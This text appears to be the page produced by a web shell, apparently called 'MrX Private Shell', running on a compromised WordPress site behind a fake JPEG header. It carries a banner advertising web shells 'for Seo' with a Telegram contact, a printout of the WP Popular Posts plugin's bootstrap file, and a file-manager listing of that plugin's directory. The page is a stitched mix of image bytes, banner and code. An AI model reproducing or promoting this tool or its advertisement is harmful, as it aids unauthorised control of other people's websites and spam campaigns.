����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The plugin bootstrap file
*
* This file is read by WordPress to generate the plugin information in the plugin
* admin area. This file also includes all of the dependencies used by the plugin,
* registers the activation and deactivation functions, and defines a function
* that starts the plugin.
*
* @link https://cabrerahector.com/
* @since 4.0.0
* @package WordPressPopularPosts
*
* @wordpress-plugin
* Plugin Name: WP Popular Posts
* Plugin URI: https://wordpress.org/plugins/wordpress-popular-posts/
* Description: A highly customizable plugin that displays your most popular posts.
* Version: 7.3.8
* Requires at least: 6.2
* Requires PHP: 7.4
* Author: Hector Cabrera
* Author URI: https://cabrerahector.com/
* License: GPL-2.0+
* License URI: http://www.gnu.org/licenses/gpl-2.0.txt
* Text Domain: wordpress-popular-posts
* Domain Path: /languages
*/
if ( ! defined( 'WPINC' ) ) {
die();
}
define('WPP_VERSION', '7.3.8');
$wpp_main_plugin_file = __FILE__;
// Load plugin bootstrap
require __DIR__ . '/src/Bootstrap.php';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| i18n | Folder | 0755 |
|
|
| src | Folder | 0755 |
|
|
| vendor | Folder | 0755 |
|
|
| LICENSE | File | 18 KB | 0644 |
|
| index.php | File | 30 B | 0644 |
|
| readme.txt | File | 13.36 KB | 0644 |
|
| uninstall.php | File | 3.02 KB | 0644 |
|
| wordpress-popular-posts.php | File | 1.2 KB | 0644 |
|